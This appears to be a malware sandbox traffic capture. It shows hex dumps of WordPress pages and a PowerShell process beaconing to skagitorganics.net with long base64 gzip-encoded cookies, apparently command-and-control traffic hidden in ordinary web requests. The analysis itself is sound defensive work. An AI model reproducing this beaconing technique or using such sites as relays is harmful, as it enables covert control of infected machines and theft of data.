                                                    2024-12-18 10:22:07 UTC535INData Raw: 37 64 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d3a<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91 d9 8a d9 86 d9 8a d9 91
                                                    Data Ascii: le><meta name="description" content="
                                                    2024-12-18 10:22:07 UTC1369INData Raw: d8 b1 d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/wp-conte
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                    Data Ascii: p-content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" content="
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69
                                                    Data Ascii: \u0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_term_stri
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33
                                                    Data Ascii: ank&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0644\u063
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 75 30 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32
                                                    Data Ascii: u0645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12-18T10:2
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28
                                                    Data Ascii: e\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74
                                                    Data Ascii: equently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                                    2024-12-18 10:22:07 UTC1369INData Raw: 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f
                                                    Data Ascii: ts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemo


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.11.2049740141.193.213.104438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:22:16 UTC2253OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: skagitorganics.net
                                                    Connection: Close
                                                    2024-12-18 10:22:17 UTC991INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:22:17 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding,Cookie
                                                    Link: <https://skagitorganics.net/wp-json/>; rel="https://api.w.org/"
                                                    Link: <https://skagitorganics.net/wp-json/wp/v2/pages/1194>; rel="alternate"; title="JSON"; type="application/json"
                                                    Link: <https://wp.me/PcRIbW-jg>; rel=shortlink
                                                    X-Powered-By: WP Engine
                                                    X-Cacheable: SHORT
                                                    Cache-Control: max-age=600, must-revalidate
                                                    X-Cache: HIT: 4
                                                    X-Cache-Group: normal
                                                    CF-Cache-Status: DYNAMIC
                                                    Set-Cookie: __cf_bm=ktIx2GEivFocna0Oa67grSECE3nt9gcVuh7WAUhWjj4-1734517337-1.0.1.1-5g6wI8mvGXtvqb3xOk226uCkr1Bp_3pwwc3yQbQKRKNaYjtjqfFkn2DP9hNo3s71pSdtNssSNm2azsT3OtOu2Q; path=/; expires=Wed, 18-Dec-24 10:52:17 GMT; domain=.skagitorganics.net; HttpOnly; Secure; SameSite=None
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6e4d9a3ebd11-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-12-18 10:22:17 UTC378INData Raw: 37 62 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 69 6e 64 65 78 2c
                                                    Data Ascii: 7bd2<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="pingback" href="https://skagitorganics.net/xmlrpc.php"><meta name='robots' content='index,
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 20 70 6c 75 67 69 6e 20 76 31 39 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 2d 20 43 61 6e 6e 61 62 69 73 20 43 6f 6d 6d 75 6e 69 74 79 20 43 6f 6e 6e 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 61 73 68 69 6e 67 74 6f 6e 26 23 30 33 39 3b 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69
                                                    Data Ascii: plugin v19.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Washington&#039;s Best RSO - Cannabis Community Connection</title><meta name="description" content="Washington&#039;s Best RSO and leading provider of pesticide-free DOH-compliant medi
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 45 73 74 2e 20 72 65 61 64 69 6e 67 20 74 69 6d 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 6d 69 6e 75 74 65 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62
                                                    Data Ascii: "summary_large_image" /><meta name="twitter:label1" content="Est. reading time" /><meta name="twitter:data1" content="3 minutes" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Web
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 34 2d 30 34 2d 31 38 54 32 30 3a 32 36 3a 34 30 2b 30 30 3a 30 30 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 27 73 20 42 65 73 74 20 52 53 4f 20 61 6e 64 20 6c 65 61 64 69 6e 67 20 70 72 6f 76 69 64 65 72 20 6f 66 20 70 65 73 74 69 63 69 64 65 2d 66 72 65 65 20 44 4f 48 2d 63 6f 6d 70 6c 69 61 6e 74 20 6d 65 64 69 63 61 6c 2d 67 72 61 64 65 20 63 61 6e 6e 61 62 69 73 20 63 6f 6e 63 65 6e 74 72 61 74 65 73 2c 20 66 6c 6f 77 65 72 2c 20 65 64 69 62 6c 65 73 2c 20 61 6e 64 20 74 6f 70 69 63 61 6c 73 2e 22 2c 22 62 72 65 61 64 63 72 75 6d 62 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6b 61 67 69 74 6f 72 67 61 6e 69 63 73 2e 6e 65 74 2f 23 62 72 65 61 64 63 72 75 6d 62 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67
                                                    Data Ascii: 4-04-18T20:26:40+00:00","description":"Washington's Best RSO and leading provider of pesticide-free DOH-compliant medical-grade cannabis concentrates, flower, edibles, and topicals.","breadcrumb":{"@id":"https://skagitorganics.net/#breadcrumb"},"inLanguag
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 73 20 62 79 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 70 6c 75 67 69 6e 20 76 37 2e 31 39 20 2d 20 55 73 69 6e 67 20 41 6e 61 6c 79 74 69 63 73 20 74 72 61 63 6b 69 6e 67 20 2d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 61 63 74 6d 65 74 72 69 63 73 2e 63 6f 6d 2f 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 4e 6f 74 65 3a 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 69 73 20 6e 6f 74 20 63 75 72 72 65 6e 74 6c 79 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 54 68 65 20 73 69 74 65 20 6f 77 6e 65 72 20 6e 65 65 64 73 20 74 6f 20 61 75 74 68 65 6e 74 69 63 61 74 65 20 77 69 74 68 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 69 6e 20 74 68 65 20 45 78 61 63 74 4d 65 74 72 69 63 73 20 73 65 74 74 69 6e 67 73 20 70 61 6e 65 6c
                                                    Data Ascii: s by ExactMetrics plugin v7.19 - Using Analytics tracking - https://www.exactmetrics.com/ -->... Note: ExactMetrics is not currently configured on this site. The site owner needs to authenticate with Google Analytics in the ExactMetrics settings panel
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64
                                                    Data Ascii: ,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\ud
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61
                                                    Data Ascii: ar e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a
